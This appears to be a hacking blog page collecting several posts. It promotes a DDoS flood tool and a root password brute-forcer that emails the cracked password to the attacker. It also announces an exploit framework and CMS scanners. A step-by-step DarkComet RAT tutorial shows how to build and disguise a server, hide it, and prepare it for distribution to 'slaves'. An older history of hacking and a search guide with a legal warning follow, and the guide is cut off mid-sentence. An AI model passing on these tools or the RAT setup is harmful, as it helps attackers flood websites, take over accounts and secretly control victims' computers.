Anonymous Attacker Package by Maxpain

"Maxpain" Hacker and Security Developer, Releases two tools in an Package called "Anonymous Attacker Package". First one is - Anonymous external attack, allows you to execute udp flood web attack, into websites, this tool was made as external of LOIC, the following package contains :

#Anonymous External Attack - A console application made in C# that allows you to flood the websites with anonymous style , and sending 4096 packets each second. The program delays some seconds for each packet that it makes, so it flood effectively without lagging your own connections. Cool for DDoS attacks. (213kb file)

#Anonymous DNS Extractor - Extracts the dns and ip servers of the following website, Developer included this program, cause in the target ip of AEA - anonymous external attack you need to use an IP. (128kb file)

Both of programs are really light and console applications, by giving you the ultimate experience web attack. These tools are available to Download Here , Virus Total Report - Clean. Still, Try these tools at your own risk, because last week we report about an Operating system called "Anonymous-OS", that was supposed to be developed by Some Anonymous Member,but in real it was a rough backdoor OS.

Read More

Joomscan 4.4.2012 Security Scanner - 623 Vulnerabilities Added

Security Team Web-Center just released an updated for Joomscan Security Scanner. The new database Have vulnarbilities 623.

Joomla! is probably the most widely-used CMS out there due to its flexibility, user friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites.

Check for new updates with command: ./joomscan.pl or check ./joomscan.pl update .

A regularly-updated signature-based scanner that can detect file inclusion, sql injection, command execution, XSS, DOS, directory traversal vulnerabilities of a target Joomla! web site.

• Download for Windows (141 KB)
• Download for Linux (150 KB)

Read More

Rootdabitch version 0.1 - Multithreaded Linux root password Bruteforcer

r00tw0rm hacker "th3breacher!" release Rootdabitch v0.1 ,which is a Multithreaded Linux/UNIX tool to brute-force cracking local root through su using sucrack.

 

sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. The main feature of the Rootdabitch is that It's local brute forcer, using 10 passwords in 3 seconds. and works in background so you can leave it , when root is cracked it will email the user using /bin/mail .

All for this, you need to have a php shell/reverse shell/ssh access to the target to run thistool and run it as a normal user, Upload this script into it and give it the execution permission and execute the script like:

 ~ ./rootdabitch youremail@address.com

If the password is cracked you will have a mail with the root password and the password will be stored into password.txt . Try it !

Download Rootdabitch 0.1

 

Read More

winAUTOPWN v3.0 Released - System vulnerability exploitation Framework

The improved GUI extension - WINAUTOPWN ACTIVE SYSTEMS TRANSGRESSOR GUI [ C4 - WAST ] is a Systems and Network Exploitation Framework built on the famous winAUTOPWN as a backend.  C4 - WAST gives users the freedom to select individual exploits and use them.

BSDAUTOPWN has been compiled, like always for various flavours and has been upgraded to version 1.8 alongwith all applicable exploits which have been added in this release. Included this time is the bsd_install.sh, which will set chmod on all applicable BSD compiled binaries.

WINAUTOPWN requires PERL,PHP,PYTHON,RUBY and its dependencies alongwith a few others' too for smooth working of exploits included in it.

winAUTOPWN and bsdAUTOPWN are available at http://winautopwn.co.nr

Read More

Security scanner for Plone CMS

Plown is a security scanner for Plone CMS. Although Plone has the best security track record of any major CMS and is considered highly secure, misconfigurations and weak passwords might enable system break-ins.
Plown has been developed to ease the discovery of usernames and passwords, and act as an assistant to system administrators to strengthen their Plone sites.

Installation

Plown is written on Python and does not need installation. Just clone the github repository and run.

user@user:~/Desktop$ git clone https://github.com/unweb/plown
user@user:~/Desktop$ cd plown
user@user:~/Desktop/plown$ ./plown.py

What can Plown do

Plown has two modes: enumeration mode and brute force mode. On enumeration mode it tries to find usernames and find out if several known vulnerabilities exist.
On brute force mode, Plown will try to authenticate to a Plone site using a list of users and passwords specified, by connecting with multiple threads. By default 16 threads are started, with that number being configurable.
Plone version enumeration is scheduled for the next release of Plown.

Download

Latest zipball

Read More

[TUT] Setting up DarkComet 5.3 [COMPLETE WITH PICTURES] [Noob Friendly]

Hi everyone,

This tutorial will explain how to set up and use the DarkComet RAT, a remote administration tool, with pictures.

Most remote administration tools require port forwarding because for the packets to reach your computer through the router, the router needs to know which computer on the network to send the packets to; you tell the router to forward any packets sent to specific port to a specific address on the network. We also need to set up a no-ip account and host because almost everyone has a dynamic IP address which means your IP address can change any moment and you will loose all your slaves/bots; no-ip prevents this by telling all bots to resolve your no-ip host which tells the bots what your IP address is.

Let's get started

Setting up no-ip

1. Navigate to no-ip.com in your browser.
2. Click on "Create Account"
   
3. Click "Sign Up" under Free DNS.
   
4. Enter your details and press "I Accept, Create my Account".
   
5. You will receive an email with an activation link. Click it to activate your account.
   
6. Login to your account and you will be in your control panel, press the large "Add a Host" button.
   
7. Enter a host name in the Hostname field that doesn't look suspicious. I use "socksproxy1" for example to make it look like it's just a proxy, even though it's not. Choose any domain they have, it doesn't matter; just make sure you remember it.
8. Don't change anything else, it's good as it. Your IP should be in the IP Address field.
9. Press "Create Host".
   
   

Portforwarding

1. Navigate to your router's internal IP address using a browser. This is generally 192.168.0.1 but it varies from model to model; I have a NetGear router. You can Google your router's model name and you will most likely find it.
2. Enter your login details. If you don't know them, ask your parents, if they don't know and your router is furnished by your Internet service provider you can try finding the details they gave you; or you can Google your router's model name and "default password" or something alike. It will generally yield results like "admin admin".
   
3. Click "Services".
   
4. Click "Add Custom Service".
   
5. Enter a name such as "Remote Administration" and select "TCP/UDP" and enter 1604 into both port fields. Press Apply.
   
6. Click "Firewall Rules".
   
7. Under "Inbound Services", press "Add".
   
8. Select "Remote Administration" from the drop down menu. Make sure it's set to "ALLOW always" for the Action drop down menu.
9. Open command prompt. Hold the Windows button on your keyboard and press R. Type cmd.exe and hit Enter.
   
10. In the command prompt window, type ipconfig and hit Enter.
11. Find your main adapter's IPV4 address. In my case it's 192.168.0.5. Enter it into the "Send to LAN Server" field.
    
12. Press "Apply".
    
    Congratulations! You've just portforwarded. If you don't use a NetGear router, navigate to Portforward.com and find your model. Follow their instructions to portforward, use port 1604.
    Note: I'd gladly write the instructions here if there weren't over 9,000 router models.
    

---

Downloading and setting up DarkComet

1. To download orginal Dark comet rat please post ur email below.. i will send u all the orginal copy of last version.. as the orginal site is no longer awailable (seized by fbi)
   
2. You'll be presented with a RAR archive, extract it using free 7-Zip or paid WinRAR.
3. Open the folder you extracted DarkComet to and run DarkCometRAT.exe.
   
4. Select the "Socket / Net" at the top of the DarkComet window.
   
5. Right click near the top list view and press "Add port to listen".
   
6. Type in 1604 or whatever port your forwarded. Uncheck "Try to forward automatically (UpNP)"; press "Listen".
   
7. Press the large blue drop down menu in the upper left hand corner and click on "Client settings".
   
8. Set up your settings like in the picture, however for the password, you can either use a small and simple password like "abc123" or "01010", but I generate a password from the Gibson Research Foundation. The password doesn't really matter as this is only for network encryption. You can leave it blank to disable password encryption, however I use it so it's more difficult to sniff the packets that would be an obvious give away.
   
9. Double click the "No-IP Updater" on the left side of the settings window.
   
10. Enter your host name, I entered socksproxy1.no-ip.org, and enter your login for the no-ip website, ensure that the "Auto update" check box is checked and then click "Update DNS".
    
11. Close the client settings window and click on the blue drop down menu again in the upper left hand corner and click on server module and then "Full".
    
12. If you entered a password in the client settings window before, Check "Security Password" and enter the password you entered. Press the "Generate" button several times next to the "Process Mutex" field. This will ensure that your slave won't be able to run the server twice by creating a mutual exclusion. If you plan on using the server in a crypter or distributing it on people who are likely to run it in a sandbox, make sure that "Active FWB" is unchecked.
    
13. On the left hand side of the window, click on "Network Settings". In the "IP/DNS" field enter your no-ip host name and for the "Port" field enter the port you forwarded; once you've entered the details, click "Add this configuration".
    
14. Click on "Module Shield" and ensure that the top three check boxes are checked to make the server more difficult to find.
    
15. Select "Build Module" and click "Build Server". You'll be prompted where to save the file, save it where you can retrieve it later.
    
    

Congratulations! You just port forwarded, set up no-ip, and downloaded + set up DarkComet. I worked on this for around 6 hours or more, so if you enjoyed this tutorial, leave a thanks on the coment section
Hopefully this helped you,

Read More

Computer hacking. Where did it begin and how did it grow?

If you wonder what it was like in days of yore, ten, twenty, thirty years
ago, how about letting and old lady tell you the way it used to be.

 Where shall we start? Seventeen years ago and the World Science Fiction
Convention in Boston, Massachusetts? Back then the World Cons were the
closest thing we had to hacker conventions. 

 Picture 1980. Ted Nelson is running around with his Xanadu  guys: Roger
Gregory, H. Keith Henson (now waging war against the Scientologists) and  K.
Eric Drexler, later to build the Foresight Institute. They dream of creating
what is to become the World Wide Web. Nowadays guys at hacker cons might
dress like vampires. In 1980 they wear identical black baseball caps with
silver wings and the slogan: "Xanadu: wings of the mind."  Others at World
Con are a bit more underground: doing dope, selling massages, blue boxing
the phone lines. The hotel staff has to close the swimming pool in order to
halt the sex orgies.

 Oh, but this is hardly the dawn of hacking. Let's look at the Boston area
yet another seventeen years further back, the early 60s.  MIT students are
warring for control of the school's mainframe computers. They use machine
language programs that each strive to delete all other programs and seize
control of the central processing unit. Back then there were no personal
computers. 

 In 1965, Ted Nelson, later to become leader of the silver wing-headed
Xanadu gang at the 1980 Worldcon, first coins the word "hypertext" to
describe what will someday become the World Wide Web. Nelson later spreads
the gospel in his book Literacy Online. 

 But in 1965 the computer is widely feared as a source of Orwellian powers.
Yes, as in George Orwell's ominous novel , "1984," that predicted a future
in which technology would squash all human freedom. Few are listening to
Nelson. Few see the wave of free-spirited anarchy the hacker culture is
already unleashing. But LSD guru Timothy Leary's daughter Susan begins to
study computer programming.

 Around 1966, Robert Morris Sr., the future NSA chief scientist, decides to
mutate these early hacker wars into the first "safe hacking" environment. He
and the two friends who code it call their game "Darwin." Later "Darwin"
becomes "Core War," a free-form computer game played to this day by some of
the uberest of uberhackers.

 Let's jump to 1968 and the scent of tear gas. Wow, look at those rocks
hurling through the windows of the computer science building at the
University of Illinois at Urbana-Champaign! Outside are 60s antiwar
protesters. Their enemy, they believe, are the campus' ARPA-funded
computers. Inside are nerdz high on caffeine and nitrous oxide. Under the
direction of the young Roger Johnson, they gang together four CDC 6400s and
link them to 1024 dumb vector graphics terminals. This becomes the first
realization of cyberspace: Plato.

 1969 turns out to be the most portent-filled year yet for hacking.

 In that year the Defense Department's Advanced Research Projects Agency
funds a second project to hook up four mainframe computers so researchers
can share their resources. This system doesn't boast the vector graphics of
the Plato system. Its terminals just show ASCII characters: letters and
numbers. Boring, huh?

 But this ARPAnet is eminently hackable. Within a year, its users  hack
together a new way to ship text files around. They call their unauthorized,
unplanned invention "email." ARPAnet has developed a life independent of its
creators. It's a story that will later repeat itself in many forms. No one
can control cyberspace. They can't even control it when it is just four
computers big.

 Also in 1969 John Goltz teams up with a money man to found Compuserve using
the new packet switched technology being pioneered by ARPAnet. Also in 1969
we see a remarkable birth at Bell Labs as Ken Thompson invents a new
operating system: Unix. It is to become the gold standard of hacking and the
Internet, the operating system with the power to form miracles of computer
legerdemain.

 In 1971, Abbie Hoffman and the Yippies found the first hacker/phreaker
magazine, YIPL/TAP (Youth International Party -- Technical Assistance
Program).  YIPL/TAP essentially invents phreaking -- the sport of playing
with phone systems in ways the owners never intended. They are motivated by
the Bell Telephone monopoly with its high long distance rates, and a hefty
tax that Hoffman and many others refuse to pay as their protest against the
Vietnam War. What better way to pay no phone taxes than to pay no phone bill
at all?

 Blue boxes burst onto the scene. Their oscillators automate the whistling
sounds that had already enabled people like Captain Crunch (John Draper) to
become the pirate captains of the Bell Telephone megamonopoly. Suddenly
phreakers are able to actually make money at their hobby. Hans and Gribble
peddle blue boxes on the Stanford campus.

 In June 1972, the radical left magazine Ramparts, in the article
"Regulating the Phone Company In Your Home"  publishes the schematics for a
variant on the blue box known as the "mute box." This article violates
Californian State Penal Code section 502.7, which outlaws the selling of
"plans or instructions for any instrument, apparatus, or device intended to
avoid telephone toll charges." California police, aided by Pacific Bell
officials, seize copies of the magazine from newsstands and the magazine's
offices. The financial stress leads quickly to bankruptcy.

 As the Vietnam War winds down, the first flight simulator programs in
history unfold on the Plato network. Computer graphics, almost unheard of in
that day, are displayed by touch-sensitive vector graphics terminals.
Cyberpilots all over the US pick out their crafts: Phantoms, MIGs, F-104s,
the X-15, Sopwith Camels. Virtual pilots fly out of digital airports and try
to shoot each other down and bomb each others' airports. While flying a
Phantom, I see a chat message on the bottom of my screen. "I'm about to
shoot you down." Oh, no, a MIG on my tail. I dive and turn hoping to get my
tormentor into my sights. The screen goes black. My terminal displays the
message "You just pulled 37 Gs. You now look more like a pizza than a human
being as you slowly flutter to Earth."

 One day the Starship Enterprise barges in on our simulator, shoots everyone
down and vanishes back into cyberspace. Plato has been hacked! Even in 1973
multiuser game players have to worry about getting "smurfed"! (When a hacker
breaks into a multiuser game on the Internet and kills players with
techniques that are not rules of the game, this is called "smurfing.")

 1975. Oh blessed year! Under a Air Force contract, in the city of
Albuquerque, New Mexico, the Altair is born. Altair. The first
microcomputer. Bill Gates writes the operating system. Then Bill's mom
persuades him to move to Redmond, CA where she has some money men who want
to see what this operating system business is all about.

 Remember Hans and Gribble? They join the Home Brew Computer club and choose
Motorola microprocessors to build their own. They begin selling their
computers, which they brand name the Apple, under their real names of Steve
Wozniak and Steve Jobs. A computer religion is born.

 The great Apple/Microsoft battle is joined. Us hackers suddenly have boxes
that beat the heck out of Tektronix terminals.

 In 1978, Ward Christenson and Randy Suess create the first personal
computer bulletin board system. Soon, linked by nothing more than the long
distance telephone network and these bulletin board nodes, hackers create a
new, private cyberspace. Phreaking becomes more important than ever to
connect to distant BBSs.

 Also in 1978, The Source and Compuserve computer networks both begin to
cater to individual users. "Naked Lady" runs rampant on Compuserve. The
first cybercafe, Planet Earth, opens in Washington, DC. X.25 networks reign
supreme.

Then there is the great ARPAnet mutation of 1980. In a giant leap it moves
from Network Control Protocol to Transmission Control Protocol/Internet
Protocol (TCP/IP). Now ARPAnet is no longer limited to 256 computers -- it
can span tens of millions of hosts! Thus the Internet is conceived within
the womb of the DoD's ARPAnet. The framework that would someday unite
hackers around the world was now, ever so quietly, growing. Plato fades,
forever limited to 1024 terminals.

Famed science fiction author Jerry Pournelle discovers ARPAnet. Soon his
fans are swarming to find excuses -- or whatever -- to get onto ARPAnet.
ARPAnet's administrators are surprisingly easygoing about granting accounts,
especially to people in the academic world. 

ARPAnet is a pain in the rear to use, and doesn't transmit visuals of
fighter planes mixing it up. But unlike the glitzy Plato, ARPAnet is really
hackable and now has what it takes to grow. Unlike the network of hacker
bulletin boards, people don't need to choose between expensive long distance
phone calls or phreaking to make their connections. It's all local and it's
all free. 

That same year, 1980, the  "414 Gang" is raided. Phreaking is more
hazardous than ever.

In the early 80s hackers love to pull pranks. Joe College sits down at his
dumb terminal to the University DEC 10 and decides to poke around the campus
network.  Here's Star Trek! Here's Adventure! Zork! Hmm, what's this program
called Sex? He runs it. A message pops up: "Warning: playing with sex is
hazardous. Are you sure you want to play? Y/N" Who can resist? With that "Y"
the screen bursts into a display of ASCII characters, then up comes the
message: "Proceeding to delete all files in this account." Joe is weeping,
cursing, jumping up and down. He gives the list files command. Nothing!
Zilch! Nada! He runs to the sysadmin. They log back into his account but his
files are all still there. A prank.

 In 1983 hackers are almost all harmless pranksters, folks who keep their
distance from the guys who break the law. MITs "Jargon file" defines hacker
as merely "a person who enjoys learning about computer systems and how to
stretch their capabilities; a person who programs enthusiastically and
enjoys dedicating a great deal of time with computers."

 1983 the IBM Personal Computer enters the stage powered by Bill Gates'
MS-DOS operating system. The empire of the CP/M operating system falls.
Within the next two years essentially all microcomputer operating systems
except MS-DOS and those offered by Apple will be dead, and a thousand
Silicon Valley fortunes shipwrecked. The Amiga hangs on by a thread. Prices
plunge, and soon all self-respecting hackers own their own computers.
Sneaking around college labs at night fades from the scene.

 In 1984 Emmanuel Goldstein launches 2600: The Hacker Quarterly and the
Legion of Doom hacker gang forms. Congress passes the Comprehensive Crime
Control Act giving the US Secret Service jurisdiction over computer fraud.
Fred Cohen, at Carnegie Melon University writes his PhD thesis on the brand
new, never heard of thing called computer viruses.

 1984. It was to be the year, thought millions of Orwell fans, that the
government would finally get its hands on enough high technology to become
Big Brother. Instead, science fiction author William Gibson, writing
Neuromancer on a manual typewriter, coins the term and paints the picture of
"cyberspace." "Case was the best... who ever ran in Earth's computer matrix.
Then he doublecrossed the wrong people..."

 In 1984 the first US police "sting" bulletin board systems appear.

 The 80s are the war dialer era. Despite ARPAnet and the X.25 networks, the
vast majority of computers can only be accessed by discovering their
individual phone lines. Thus one of the most treasured prizes of the 80s
hacker is a phone number to some mystery computer. 

 Computers of this era might be running any of dozens of arcane operating
systems and using many communications protocols. Manuals for these systems
are often secret. The hacker scene operates on the mentor principle. Unless
you can find someone who will induct you into the inner circle of a hacker
gang that has accumulated documents salvaged from dumpsters or stolen in
burglaries, you are way behind the pack. Kevin Poulson makes a name for
himself through many daring burglaries of Pacific Bell. 

 Despite these barriers, by 1988 hacking has entered the big time. According
to a list of hacker groups compiled by the editors of  Phrack on August 8,
1988, the US hosts hundreds of them. 

 The Secret Service covertly videotapes the 1988 SummerCon convention.

 In 1988 Robert Tappan Morris, son of NSA chief scientist Robert Morris Sr.,
writes an exploit that will forever be known as the Morris Worm. It uses a
combination of finger and sendmail exploits to break into a computer, copy
itself and then send copy after copy on to other computers. Morris, with
little comprehension of the power of this exponential replication, releases
it onto the Internet. Soon vulnerable computers are filled to their digital
gills with worms and clogging communications links as they send copies of
the worms out to hunt other computers. The young Internet, then only a few
thousand computers strong, crashes. Morris is arrested, but gets off with
probation.

 1990 is the next pivotal year for the Internet, as significant as 1980 and
the launch of TCP/IP.  Inspired by Nelson's Xanadu, Tim Berners-Lee of the
European Laboratory for Particle Physics (CERN) conceives of a new way to
implement hypertext. He calls it the World Wide Web. In 1991 he quietly
unleashes it on the world. Cyberspace will never be the same. Nelson's
Xanadu, like Plato, like CP/M, fades. 

 1990 is also a year of unprecedented numbers of hacker raids and arrests.
The US Secret Service and New York State Police raid Phiber Optik, Acid
Phreak, and Scorpion in New York City, and arrest Terminus, Prophet,
Leftist, and Urvile.

 The Chicago Task Force arrests Knight Lightning and raids Robert Izenberg,
Mentor, and Erik Bloodaxe. It raids both Richard Andrews' home and business.
The US Secret Service and Arizona Organized Crime and Racketeering Bureau
conduct Operation Sundevil raids in Cincinnatti, Detroit, Los Angeles,
Miami, Newark, Phoenix, Pittsburgh, Richmond, Tucson, San Diego, San Jose,
and San Francisco. A famous unreasonable raid that year was the Chicago Task
Force invasion of Steve Jackson Games, Inc.

 June 1990 Mitch Kapor and John Perry Barlow react to the excesses of all
these raids to found the Electronic Frontier Foundation. Its initial purpose
is to protect hackers. They succeed in getting law enforcement to back off
the hacker community.

 In 1993, Marc Andreesson and Eric Bina of the National Center for
Supercomputing Applications release Mosaic, the first WWW browser that can
show graphics. Finally, after the fade out of the Plato of twenty years
past, we have decent graphics! This time, however, these graphics are here
to stay. Soon the Web becomes the number one way that hackers boast and
spread the codes for their exploits. Bulletin boards, with their tightly
held secrets, fade from the scene.

 In 1993, the first Def Con invades Las Vegas. The era of hacker cons moves
into full swing with the Beyond Hope series, HoHocon and more.

 1996 Aleph One takes over the Bugtaq email list and turns it into the first
public "full disclosure" computer security list. For the first time in
history, security flaws that can be used to break into computers are being
discussed openly and with the complete exploit codes. Bugtraq archives are
placed on the Web.

 In August 1996 I start mailing out Guides to (mostly) Harmless Hacking.
They are full of  simple instructions designed to help novices understand
hacking. A number of hackers come forward to help run what becomes the Happy
Hacker Digest.

 1996 is also the year when documentation for routers, operating systems,
TCP/IP protocols and much, much more begins to proliferate on the Web. The
era of daring burglaries of technical manuals fades.

 In early 1997 the readers of Bugtraq begin to tear the Windows NT operating
system to shreds. A new mail list, NT Bugtraq, is launched just to handle
the high volume of NT security flaws discovered by its readers.
Self-proclaimed hackers Mudge and Weld of The L0pht, in a tour de force of
research, write and release a password cracker for WinNT that rocks the
Internet. Many in the computer security community have come far enough along
by now to realize that Mudge and Weld are doing the owners of NT networks a
great service.

 Thanks to the willingness of hackers to share their knowledge on the Web,
and mail lists such as Bugtraq, NT Bugtraq and Happy Hacker, the days of
people having to beg to be inducted into hacker gangs in order to learn
hacking secrets are now fading.

 Where next will the hacker world evolve? You hold the answer to that in
your hands.

Read More

How to use the Web to look up information on hacking.

This GTMHH may be useful even to Uberhackers (oh, no, flame alert!)
____________________________________________________________

Want to become really, really unpopular? Try asking your hacker friends too
many questions of the wrong sort.

But, but, how do we know what are the wrong questions to ask? OK, I
sympathize with your problems because I get flamed a lot, too. That's partly
because I sincerely believe in asking dumb questions. I make my living
asking dumb questions. People pay me lots of money to go to conferences,
call people on the phone and hang out on Usenet news groups asking dumb
questions so I can find out stuff for them. And, guess what, sometimes the
dumbest questions get you the best answers. So that's why you don't see me
flaming people who ask dumb questions.

********************************************************
Newbie note: Have you been too afraid to ask the dumb question, "What is a
flame?" Now you get to find out! It is a bunch of obnoxious rantings and
ravings made in email or a Usenet post by some idiot who thinks he or she is
proving his or her mental superiority through use of foul and/or impolite
language such as "you suffer from rectocranial inversion," f*** y***, d****,
b****, and of course @#$%^&*! This newbie note is my flame against those
flamers to whom I am soooo superior.
********************************************************

But even though dumb questions can be good to ask, you may not like the
flames they bring down on you. So, if you want to avoid flames, how do you
find out answers for yourself?

This Guide covers one way to find out hacking information without having to
ask people questions: by surfing the Web. The other way is to buy lots and
lots of computer manuals, but that costs a lot of money. Also, in some parts
of the world it is difficult to get manuals. Fortunately, however, almost
anything you want to learn about computers and communications is available
for free somewhere on the Web.

First, let's consider the Web search engines. Some just help you search the
Web itself. But others enable you to search Usenet newsgroups that have been
archived for many years back. Also, the best hacker email lists are archived
on the Web, as well.

There are two major considerations in using Web search engines. One is what
search engine to use, and the other is the search tactics themselves.

I have used many Web search engines. But eventually I came to the conclusion
that for serious research, you only need two: Alavista
(http://altavista.digital.com)and Dejanews (http://www.dejanews.com).
Altavista is the best for the Web, while Dejanews is the best one for
searching Usenet news groups. But, if you don't want to take me at my word,
you may surf over to a site with links to almost all the Web and Newsgroup
search engines at http://sgk.tiac.net/search/.

But just how do you efficiently use these search engines? If you ask them to
find "hacker" or even "how to hack," you will get bazillions of Web sites
and news group posts to read. OK, so you painfully surf through one hacker
Web site after another. You get portentous-sounding organ music, skulls with
red rolling eyes, animated fires burning, and each site has links to other
sites with pretentious music and ungrammatical boastings about "I am 31337,
d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my
$%^&&*!" But somehow they don't seem to have any actual information. Hey,
welcome to the wannabe hacker world!

You need to figure out some words that help the search engine of your choice
get more useful results. For example, let's say you want to find out whether
I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or
merely some poser. Now the luser approach would to simply go to
http://www.dejanews.com and do a search of Usenet news groups for "Carolyn
Meinel," being sure to click the "old" button to bring up stuff from years
back. But if you do that, you get this huge long list of posts, most of
which have nothing to do with hacking:

CDMA vs GSM - carolyn meinel <cmeinel@unm.edu> 1995/11/17 

Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J.
Gonthier) 1995/11/20 

Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30 
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16 

Re: Lyndon LaRouche - who is he? lness@ucs.indiana.edu (lester john ness)
1996/01/06 

U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel)
1996/05/13 

Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK
Smiley) 1996/08/11 

Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12 

Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06 

Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous
MacDonald, a remailer node) 1996/12/12 

Anyhow, this list goes on and on and on.

But if you specify "Carolyn Meinel hacker" and click "all" instead of "any"
on the "Boolean" button, you get a list that starts with:

Media: "Unamailer delivers Christmas grief" -Mannella@ipifidpt.difi.unipi.it
(Riccardo Mannella) 1996/12/30 Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest
(tk0jut2@mvs.cso.niu.edu)
<TK0JUT2@MVS.CSO.NIU.EDU> 1996/12/31

RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S.
McWilliams) 1997/01/08 
     
Etc.

This way all those posts about my boring life in the world of science don't
show up, just the juicy hacker stuff. 

Now suppose all you want to see is flames about what a terrible hacker I am.
You could bring those to the top of the list by adding (with the "all"
button still on) "flame" or "f***" or "b****" being careful to spell out
those bad words instead fubarring them with ****s. For example, a search on
"Carolyn Meinel hacker flame" with Boolean "all" turns up only one post.
This important tome says the Happy Hacker list is a dire example of what
happens when us prudish moderator types censor naughty words and inane
diatribes.

******************************************
Newbie note: "Boolean" is  math term. On the Dejanews search engine they
figure the user doesn't have a clue of what "Boolean" means so they give you
a choice of "any" or "all" and then label it "Boolean" so you feel stupid if
you don't understand it. But in real Boolean algebra we can use the
operators "and" "or" and "not" on word searches (or any searches of sets).
"And" means you would have a search that turns up only items that have "all"
the terms you specify; "or" means you would have a search that turns up
"any" of the terms. The "not" operator would exclude items that included the
"not" term even if they have any or all of the other search terms. Altavista
has real Boolean algebra under its "advanced"" search option.
******************************************

But let's forget all those Web search engines for a minute. In my humble yet
old-fashioned opinion, the best way to search the Web is to use it exactly
the way its inventor, Tim Berners-Lee, intended. You start at a good spot
and then follow the links to related sites. Imagine that! 

Here's another of my old fogie tips. If you want to really whiz around the
Web, and if you have a shell account, you can do it with the program lynx.
At the prompt, just type "lynx followed by the URL you want to visit.
Because lynx only shows text, you don't have to waste time waiting for the
organ music, animated skulls and pornographic JPEGs to load.

So where are good places to start? Simply surf over to the Web sites listed
at the end of this Guide. Not only do they carry archives of these Guides,
they carry a lot of other valuable information for the newbie hacker, as
well as links to other quality sites. My favorites are
http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org
Warning: parental discretion advised. You'll see some other great starting
points elsewhere in this Guide, too.

Next, consider one of the most common questions I get: "How do I break into
a computer????? :( :("

Ask this of someone who isn't a super nice elderly lady like me and you will
get a truly rude reaction. Here's why. The world is full of many kinds of
computers running many kinds of software on many kinds of networks. How you
break into a computer depends on all these things. So you need to thoroughly
study a computer system before you an even think about planning a strategy
to break into it. That's one reason breaking into computers is widely
regarded as the pinnacle of hacking. So if you don't realize even this much,
you need to do lots and lots of homework before you can even dream of
breaking into computers.

But, OK, I'll stop hiding the secrets of universal computer breaking and
entry. Check out:
Bugtraq archives: http://geek-girl.com/bugtraq
NT Bugtraq archives: http://ntbugtraq.rc.on.ca/index.html

***************************************************
You can go to jail warning: If you want to take up the sport of breaking
into computers, you should either do it with your own computer, or else get
the permission of the owner if you want to break into someone else's
computer. Otherwise you are violating the law. In the US, if you break into
a computer that is across a state line from where you launch your attack,
you are committing a Federal felony. If you cross national boundaries to
hack, remember that most nations have treaties that allow them to extradite
criminals from each others' countries.
***************************************************

Wait just a minute, if you surf over to those site you won't instantly
become an Ubercracker. Unless you already are an excellent programmer and
knowledgeable in Unix or Windows NT, you will discover the information at
these two sites will *NOT* instantly grant you access to any victim computer
you may choose. It's not that easy. You are going to have to learn how to
program. Learn at least one operating system inside and out. 

Of course some people take the shortcut into hacking. They get their
phriends to give them a bunch of canned break-in programs. Then they try
them on one computer after another until they stumble into root and
accidentally delete system files. The they get busted and run to the
Electronic Freedom Foundation and whine about how the Feds are persecuting them.

So are you serious? Do you *really* want to be a hacker badly enough to
learn an operating system inside and out? Do you *really* want to populate
your dreaming hours with arcane communications protocol topics? The
old-fashioned, and super expensive way is to buy and study lots of manuals.
<Geek mode on> Look, I'm a real believer in manuals. I spend about $200 per
month on them. I read them in the bathroom, while sitting in traffic jams,
and while waiting for doctor's appointments. But if I'm at my desk, I prefer
to read manuals and other technical documents from the Web. Besides, the Web
stuff is free! <Geek mode off>

The most fantastic Web resource for the aspiring geek, er, hacker, is the
RFCs. RFC stands for "Request for Comment." Now this sounds like nothing
more than a discussion group. But actually RFCs are the definitive documents
that tell you how the Internet works. The funny name "RFC" comes from
ancient history when lots of people were discussing how the heck to make
that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the
Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over."

********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment
launched in 1969 that evolved into the Internet. When you read RFCs you will
often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D"
stands for "defense." DARPA/ARPA keeps on getting its name changed between
these two. For example, when Bill Clinton became US President in 1993, he
changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996
the US Congress passed a law changing it back to DARPA because "defense" is
a Good Thing.
********************************************************

Now ideally you should simply read and memorize all the RFCs. But there are
zillions of RFCs and some of us need to take time out to eat and sleep. So
those of us without photographic memories and gobs of free time need to be
selective about what we read. So how do we find an RFC that will answer
whatever is our latest dumb question?

One good starting place is a complete list of all RFCs and their titles at
ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file
transfer protocol) site, you can access it with your Web browser. 

Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify
the status of RFCs and to provide some guidance for the authors of RFCs in
the future.  It is in a sense a specification for RFCs." To find this RFC,
or in fact any RFC for which you have its number, just go to Altavista and
search for "RFC 825" or whatever the number is. Be sure to put it in quotes
just like this example in order to get the best results.

Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know
which RFC to read to get an answer to our questions? Guess what, there is
solution, a fascinating group of RFCs called "FYIs" Rather than specifying
anything, FYIs simply help explain the other RFCs. How do you get FYIs?
Easy! I just surfed over to the RFC on FYIs (1150) and learned that:

   FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname
   FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of
   the FYI and "nnnn" refers to the number of the RFC).  Login with FTP,
   username ANONYMOUS and password GUEST.  The NIC also provides an
   automatic mail service for those sites which cannot use FTP.  Address
   the request to SERVICE@NIC.DDN.MIL and in the subject field of the
   message indicate the FYI or RFC number, as in "Subject: FYI mm" or
   "Subject: RFC nnnn".

But even better than this is an organized set of RFCs hyperlinked together
